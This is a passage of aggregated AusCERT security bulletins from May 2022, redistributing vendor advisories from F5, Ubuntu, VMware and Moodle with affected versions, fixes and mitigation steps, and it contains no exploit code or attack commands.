+------------+------+--------------+----------+----------+------+-------------+ |F5OS-C |1.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | +------------+------+--------------+----------+----------+------+-------------+ | | |5.2.0 | | | |NMS, FEP, | |Traffix SDC |5.x |5.1.0 |None |High |7.0 |CPF, CM, and | | | | | | | |webUI. | +------------+------+--------------+----------+----------+------+-------------+ ^1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle. ^2The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by installing a version listed in the Fixes introduced in column. If the Fixes introduced in column does not list a version for your branch, then no update candidate currently exists for that branch and F5 recommends upgrading to a version with the fix (refer to the table). If the Fixes introduced in column lists a version prior to the one you are running, in the same branch, then your version should have the fix. Mitigation For BIG-IP and BIG-IQ Until you can install a fixed version, you can use the following sections as temporary mitigations. These mitigations restrict access to iControl REST to only trusted networks or devices, thereby limiting the attack surface. o Block iControl REST access through the self IP address o Block iControl REST access through the management interface Block iControl REST access through the self IP address You can block all access to the iControl REST interface of your BIG-IP or BIG-IQ system through self IP addresses. To do so, you can change the Port Lockdown setting to Allow None for each self IP address in the system. If you must open any ports, you should use the Allow Custom option, taking care to disallow access to iControl REST. By default, iControl REST listens on TCP port 443 or TCP port 8443 on single NIC BIG-IP VE instances. If you modified the default port, ensure that you disallow access to the alternate port you configured. Note: Performing this action prevents all access to the Configuration utility and iControl REST using the self IP address. These changes may also impact other services, including breaking high availability (HA) configurations. Before you make changes to the configuration of your self-IP addresses, F5 strongly recommends that you refer to the following articles: o K17333: Overview of port lockdown behavior (12.x - 17.x) o K39403510: Managing the port lockdown configuration on the BIG-IQ system o K13092: Overview of securing access to the BIG-IP system o K31003634: The Configuration utility of the Single-NIC BIG-IP Virtual Edition now defaults to TCP port 8443 o K51358480: The single-NIC BIG-IP VE may erroneously revert to the default management httpd port after a configuration reload If you must expose port 443 on your self IP addresses and want to restrict access to specific IP ranges, you may consider using the packet filtering functionality built in to the BIG-IP system. For more information, refer to the following article: o K13383: Configuring CIDR Network Addresses for the BIG-IP packet filter For BIG-IQ self IP addresses where port 443 is exposed, use an external packet filtering device such as the BIG-IP Advanced Firewall Manager (AFM). Block iControl REST access through the management interface To mitigate this vulnerability for affected F5 products, you should restrict management access to only trusted users and devices over a secure network. For more information about securing access to BIG-IP or BIG-IQ systems, refer to the following articles: o K13092: Overview of securing access to the BIG-IP system o K46122561: Restricting access to the management interface using network firewall rules o K92748202: Restricting access to the BIG-IQ management interface using network firewall rules o K69354049: Restricting access to the BIG-IP management interface for Configuration Utility and iControl REST services using iptables Note: For BIG-IQ 7.x, secure the management interface by using an external packet filtering device such as the BIG-IP Advanced Firewall Manager (AFM). Supplemental Information o K41942608: Overview of security advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K8986: F5 software lifecycle policy o K9502: BIG-IP hotfix and point release matrix o K13123: Managing BIG-IP product hotfixes (11.x - 17.x) o K15106: Managing BIG-IQ product hotfixes o K15113: BIG-IQ hotfix and point release matrix o K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later) o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXIIckNZI30y1K9AQgDUg//S1F0WPScAx+6kFiJ+Nfo2lmnfoi2XShh ZArU2npjd1BN84lacIjQM6e7Gi9XTPzwgItFMrONFlnhHHzVL9s8l7UTDxyPfD1K dOGzGnwLhOsyYvPlSsJiEPjUoO8RnFzbnsf4s7VZ3bBVByrZhUopX5sSxoTXsFoj at1F1w0t7/I0ZkSbfIZ9fbLLUq4ekvwfij2FNoco+6E48WOF1zEVU+xmGo6bmEVm nsygATS7Trp75tW1I/2CBATkvhrq6M2lB3243p+Sh28KmhLNym12+2u6r+CwChWY 4CK76PA3iXZ35c7TJfZDiQ+6QY5C3ToAVX7O9lOZdvWRNI6w83/+2NpctgaK/hwb 1jKwW5F+BHFq2I8pG9Ws2gz11kr39E8ax+TFg9xJiHWSo+FuL2+ckhopHL9jmTSl gD8SpW9ZwnJgxl/AAYp+oMn/yXCdVBlXQfkL50V3SbAc2QSIbb1rLQ3IKFbH2DED cCdNZqZ6DkSuAHzdDflFEOGex3q7vJ0T2YsmOlb04lZn1yh2OSFkXq1zEdSYpzpn rvjI84JB+amiU7700ueGCUcllesVENAWccma9Qxuy1JanT7C89sran1tiC9r2KhA OqLu444h43MQG42YxUGYX3FlHo6341FrMz8vi3Km/82k2pSV4NsZWZXxQmlV3ebJ larRs4v3W2M= =4Lyo -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2446 - [Ubuntu] libXrandr: CVSS (Max): 9.8

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2446 USN-5428-1: libXrandr vulnerabilities 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: libXrandr Publisher: Ubuntu Operating System: Ubuntu Resolution: Patch/Upgrade CVE Names: CVE-2016-7948 CVE-2016-7947 Original Bulletin: https://ubuntu.com/security/notices/USN-5428-1 Comment: CVSS (Max): 9.8 CVE-2016-7948 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVSS Source: NVD Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- USN-5428-1: libXrandr vulnerabilities 18 May 2022 Several security issues were fixed in libXrandr. Releases o Ubuntu 16.04 ESM Packages o libxrandr - X11 RandR extension library Details Tobias Stoeckmann discovered that libXrandr incorrectly handled certain responses. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code. ( CVE-2016-7947 , CVE-2016-7948 ) Update instructions The problem can be corrected by updating your system to the following package versions: Ubuntu 16.04 o libxrandr2 - 2:1.5.0-1ubuntu0.1~esm1 Available with UA Infra or UA Desktop In general, a standard system update will make all the necessary changes. References o CVE-2016-7947 o CVE-2016-7948 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXIEMkNZI30y1K9AQhstRAAgejJpRxjMuSZHF+DQUs/OlQh4C2xff6K Yrittj+UJHfKtE0Vka/xL0JyeItaqIvTLALeYkWkrV8a0lrTVzwsYkie0evjZIvD hF7K+H99RhA8SBGFg5BaT0MN5Rrp58Dhu8l+BsxMC0N3p1kJrqSeoKBchC9G5f3K fAvtXw+5toZI9iZwThWaIncl4YufJ5ohbPMq2bpJsaENp+D+T0XUBTZftCcOvY0w 3OZtul9XsDJfFhuXyc5JNMMKIP7a3KgUH+51iqjPb4WRaPl+vgI1iRah1wEYUOyj luHBXOnvyeq7Cck9LWL9BXRhcsBYnxlp+hux6h3b34lvuECbCStPELHcp8z4qGRa 8E69m/mDOWqCiPe6bYwq3i/Zp35LwQRKqYyfpb3FP9Ei3QYwzJaR8iyByXAyihca owBGtlmjmUFyKk9iMOlmnY+k6UARNgE42ZRrrwiysQrVKAbQnPBgE9Rc+EVqnhFO hXDYmQwsCusVJwOfpyVh5a7n8Nhv0eLDlBJZH83Shz5yGvLSFQaHCLBhiajQ8gwT o1RK93BMq1pabJVhpNkq8ETowpOuHO9Q0NZe/WqVvlfATKqfQQAVmed1mqlmmkz8 /ZqVTNLy55bHUDqiuZwpjDuvT0Eo9ehsNJtQ4DfYxFYEFAgUQVfQlckvB/mL3XKf wsPiSoiC3oY= =L0os -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2445 - [Ubuntu] bind9: CVSS (Max): 7.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2445 USN-5429-1: Bind vulnerability 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: bind9 Publisher: Ubuntu Operating System: Ubuntu Resolution: Patch/Upgrade CVE Names: CVE-2022-1183 Original Bulletin: https://ubuntu.com/security/notices/USN-5429-1 Comment: CVSS (Max): 7.5 CVE-2022-1183 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) CVSS Source: Red Hat Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- USN-5429-1: Bind vulnerability 18 May 2022 Bind could be made to crash if it received specially crafted network traffic. Releases o Ubuntu 22.04 LTS Packages o bind9 - Internet Domain Name Server Details Thomas Amgarten discovered that Bind incorrectly handled certain TLS connections being destroyed. A remote attacker could possibly use this issue to cause Bind to crash, resulting in a denial of service. Update instructions The problem can be corrected by updating your system to the following package versions: Ubuntu 22.04 o bind9 - 1:9.18.1-1ubuntu1.1 In general, a standard system update will make all the necessary changes. References o CVE-2022-1183 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXIBskNZI30y1K9AQjPuBAAmojRGvsZprQcPGZljSIRIlEpfQ7hOYuq 9cr90dPLFJf1A25joPkuraE+0fhkgxDkXe4MNhPoPtEEj0+TMGW9BbfubkCwKulb oD1dkL4ZdDpaz7Kb1+DsDBifTpbF1tWXvShS6qVWCxmY8Cyzs2aMQuJAk6/Wl1Vt uMukskSfVMLXD27iEwz5stsM34vTKRjMtqmKq5byJ7CJE16/ZsLi6wz5LM0J1xF3 gzhTS2e6wbJaGqCfpcwbTgdTQm45w92HNLh0028FP4+PvGcLb2AO0KgipW/Jpbvm CQCP7J73br+E3BQIcgvOYVpDqk3npF7/hEgXkUvBWi2TFpEfuV9VSbsEGhy38i80 esyjl1VTkK5afGiTAPiBor8BTzkVZtoAv1c583lpPXGjqlShCn0pHAxrZWiTKeHc 8i/5UQjuc9wBShPG2mMLZjkFUN75476Xx3g/zW93zbrcXrLrePth1oksbdyK3XuX e4U1w/YFdqNJShvxtimJ36aALNMeW6lRFjozqT+qqZbduvSGxe9Fl2KHGonqSSIK sQubwFfNtpCW3BDoUtrchOOJed8G/oJmXO0phpZ4PUCQ9up7LrTtlhn+7VogbMDA YIG3p+PhYH1KWICghARuSXuE4ib+I9v/g+lhI00g4uoz29OavW95utE8rjBVn0gS /hIuURkIwW8= =ndbY -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2444 - [Ubuntu] gnome-control-center: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2444 USN-5430-1: GNOME Settings vulnerability 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: gnome-control-center Publisher: Ubuntu Operating System: Ubuntu Resolution: Patch/Upgrade CVE Names: CVE-2022-1736 Original Bulletin: https://ubuntu.com/security/notices/USN-5430-1 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- USN-5430-1: GNOME Settings vulnerability 18 May 2022 GNOME Settings could allow unintended access to network services. Releases o Ubuntu 22.04 LTS Packages o gnome-control-center - utilities to configure the GNOME desktop Details It was discovered that GNOME Settings incorrectly handled the remote desktop sharing configuration. When turning off desktop sharing, it may be turned on again after rebooting, contrary to expectations. Update instructions The problem can be corrected by updating your system to the following package versions: Ubuntu 22.04 o gnome-control-center - 1:41.4-1ubuntu13.2 After a standard system update you need to reboot your computer to make all the necessary changes. References o CVE-2022-1736 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXH9ckNZI30y1K9AQiymA//bP8qn2jkRB+9mvbMR+CdBI+PsuY6mPKz aoMfnHz8QAbB29E5IurlXmGVWz1TzMkY8kPIqA92eq5Efb1PrP6MaHGTV4P0jhqd /TAJBBC7Ks5iYCBf3rBYZCjB3LXKR0l5lZhY8WQTyOpVOKojnG1ZFiWp7krKsuqx OvvgmyOu4S83SDbQlgN02kkE75JYzrjvRPPMWxHtbJ0J7P+eNGVR6yI7343GL1t1 QasnwTibsbDhLM6mUaPOrtmH0Upm8cAoK0Zu+QRi+GNZeO8daHdsmASPd6sfKqir Gd7UjfW8wT3SxCsd9aj5q7U6hGkkzNPNcFMsAQLjG4ZmPeELDNmcQUHFdY7b7H7r nMYK71pY802QMiOOj6at7T05XklYFGmGLivxiScpPZ5Vve2HkhgXTgpqcREOLKCV 0wKd8P4SYgBVzbCFrE/cKF4u9qxH3XZ2K+N+zTOm63NRDsu5dgwAbBlRnQmlhI4H qNVjOWw+hXE1YX+Q9WS6PxFrjCw3ahhWzw0Frsr7KUPmyGRg6DbDUl2qQ3LQcQYi nyF7a5VaIXkMPKo2OoNy3/f1MZYdoczVjWOxDRR+7xBH+EiY/zYb4XfM6hEI9TfT JG55R8mppdelblbHtAxYiF/18/HwWi0z78Tn9JGx880bRblphKNzNgVnpwEfYjyU j1T5lPCAths= =JTIC -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2443 - [Win][Linux][Virtual] VMware Products: CVSS (Max): 9.8

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2443 Critical Severity - VMSA-2022-0014 - VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: VMware Workspace ONE Access (Access) VMware Identity Manager (vIDM) VMware vRealize Automation (vRA) VMware Cloud Foundation vRealize Suite Lifecycle Manager Publisher: VMware Operating System: Linux variants Virtualisation Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-22973 CVE-2022-22972 Original Bulletin: https://www.vmware.com/security/advisories/VMSA-2022-0014.html Comment: CVSS (Max): 9.8 CVE-2022-22972 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVSS Source: VMware Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - --------------------------BEGIN INCLUDED TEXT-------------------- Critical Advisory ID: VMSA-2022-0014 CVSSv3 Range: 7.8-9.8 Issue Date: 2022-05-18 Updated On: 2022-05-18 CVE(s): CVE-2022-22972, CVE-2022-22973 Synopsis: VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities. 1. Impacted Products o VMware Workspace ONE Access (Access) o VMware Identity Manager (vIDM) o VMware vRealize Automation (vRA) o VMware Cloud Foundation o vRealize Suite Lifecycle Manager 2. Introduction Multiple vulnerabilities were privately reported to VMware. Patches are available to remediate these vulnerabilities in affected VMware products. 3a. Authentication Bypass Vulnerability (CVE-2022-22972) Description VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Known Attack Vectors A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. Resolution To remediate CVE-2022-22972, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below. Workarounds Workarounds for CVE-2022-22972 have been documented in the VMware Knowledge Base articles listed in the 'Workarounds' column of the 'Response Matrix' below. Additional Documentation A supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2022-0014-qna Notes None. Acknowledgements VMware would like to thank Bruno Lopez of Innotec Security for reporting this vulnerability to us. 3b. Local Privilege Escalation Vulnerability (CVE-2022-22973) Description VMware Workspace ONE Access and Identity Manager contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. Known Attack Vectors A malicious actor with local access can escalate privileges to 'root'. Resolution To remediate CVE-2022-22973 apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below. Workarounds None. Additional Documentation A supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2022-0014-qna Notes None. Acknowledgements VMware would like to thank Kai Zhao of ToTU Security Team and Steven Yu for independently reporting this issue to us. Response Matrix Product Version Running CVE Identifier CVSSv3 Severity Fixed Workarounds Additional On Version Documentation Access 21.08.0.1, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 21.08.0.0 Access 21.08.0.1, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 21.08.0.0 Access 20.10.0.1, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 20.10.0.0 Access 20.10.0.1, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 20.10.0.0 3.3.6, vIDM 3.3.5, Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ 3.3.4, 3.3.3 3.3.6, vIDM 3.3.5, Linux CVE-2022-22973 7.8 important KB88438 None FAQ 3.3.4, 3.3.3 vRealize CVE-2022-22972, Automation 8.x Linux CVE-2022-22973 N/A N/A Unaffected N/A N/A [1] vRealize Automation 7.6 Linux CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ (vIDM) [2] vRealize Automation 7.6 Linux CVE-2022-22973 N/A N/A Unaffected N/A N/A (vIDM) [1] vRealize Automation 8.x is unaffected since it does not use embedded vIDM. If vIDM has been deployed with vRA 8.x, fixes should be applied directly to vIDM. [2] vRealize Automation 7.6 is affected since it uses embedded vIDM. Impacted Product Suites that Deploy Response Matrix Components: Product Version Running CVE Identifier CVSSv3 Severity Fixed Workarounds Additional On Version Documentation VMware 4.3.x, Cloud 4.2.x, Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Foundation 4.1, (vIDM) 4.0.x VMware 4.3.x, Cloud 4.2.x, Any CVE-2022-22973 7.8 important KB88438 None FAQ Foundation 4.1, (vIDM) 4.0.x VMware Cloud 3.x Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Foundation (vRA) vRealize Suite Lifecycle 8.x Any CVE-2022-22972 9.8 critical KB88438 KB88433 FAQ Manager (vIDM) vRealize Suite Lifecycle 8.x Any CVE-2022-22973 7.8 important KB88438 None FAQ Manager (vIDM) 4. References Fixed Version(s): https://kb.vmware.com/s/article/88438 Workarounds: https://kb.vmware.com/s/article/88433 Mitre CVE Dictionary Links: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22973 FIRST CVSSv3 Calculator: CVE-2022-22972: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2022-22973: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 5. Change Log 2022-05-18: VMSA-2022-0014 Initial security advisory. 6. Contact E-mail list for product security notifications and announcements: https://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce@lists.vmware.com bugtraq@securityfocus.com fulldisclosure@seclists.org E-mail: security@vmware.com PGP key at: https://kb.vmware.com/kb/1055 VMware Security Advisories https://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html VMware Security & Compliance Blog https://blogs.vmware.com/security Twitter https://twitter.com/VMwareSRC - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoWzMMkNZI30y1K9AQg7nxAAoBeBgcywRgyFofgOMhQaX4jgpZgQhT3n 0oVOLR8SQ+pm1NdCrBmTLndwKFdeMAufyaHMdU/PRhfrlnmkp1gDV5dIaK1AyrX1 PD23UMg1VwG8LFvmKYHrNV+++Uh5kbEDP0RA2/KOX8aKHg+0YKQEd3fDsxQhbmVA +NiySe2U5nNaqPBa2YfAL11NyLuyGFfVbHBlK+4weunHF4B1LDs78F11NPs+8yID Uhw+xjwtLtVzHdx1gsfLDh7+PdfpVt9ZqHaJgs6fRlkIhpRog+zTP22u7jbteCKY eWixhhZNiATGqzjeT+lSgZy7SThmXN9S/4bZTkF7x1Rvo0m8qmg8idUHX+uwELUJ twQ9Fh0DH5Shm08cGrR/pfkU/utgWkLnsKsbumXLzsB8Z9GF6mnB1BIR+mdkRiI3 ZBwfPGcKEIGhsBmlnVWGHu1Iw7q3bvYx3Tlzy6fpeZ6KDH5YByIEJbit6EITWCPD osIxqPU3uBSQf+hn/Kkf+CnGIgbBN/MRy8/KtDYRxKDeYrVfgQiJjnH/XsvjHj41 ycoLW8a0GAXkoE7W0jkycZMt/PnsxsEQEn/pCc1ynq97WecRBJg7TDTwIMFVNT3+ D2eo1bpsXiwjKQ7s8jaRcE8hMMOoP7bKAXJwZ6mZU5pujz3I/RvoFYqmQuFO+c8M B1u8g7qINRk= =AMOX -----END PGP SIGNATURE-----
2022. május 18.

ESB-2022.2442 - [Win][UNIX/Linux] Moodle: CVSS (Max): None

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2442 MSA-22-0014: Failed login attempts counted incorrectly 18 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Moodle Publisher: Moodle Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Patch/Upgrade CVE Names: CVE-2022-30600 Original Bulletin: https://moodle.org/mod/forum/discuss.php?d=434582&parent=1748726 Comment: CVSS (Max): None available when published - --------------------------BEGIN INCLUDED TEXT-------------------- MSA-22-0014: Failed login attempts counted incorrectly An issue in the logic used to count failed login attempts could result in the account lockout threshold being bypassed. Severity/Risk: Serious Versions affected: 4.0, 3.11 to 3.11.6, 3.10 to 3.10.10, 3.9 to 3.9.13 and earlier unsupported versions Versions fixed: 4.0.1, 3.11.7, 3.10.11 and 3.9.14 Reported by: Shamim Rezaie CVE identifier: CVE-2022-30600 Changes (master): http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-73736 Tracker issue: MDL-73736 Failed login attempts counted incorrectly - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoRtg8kNZI30y1K9AQiWqw/+MWGz5QJLm/PfJlQtjN42mAgAriNO9O3V 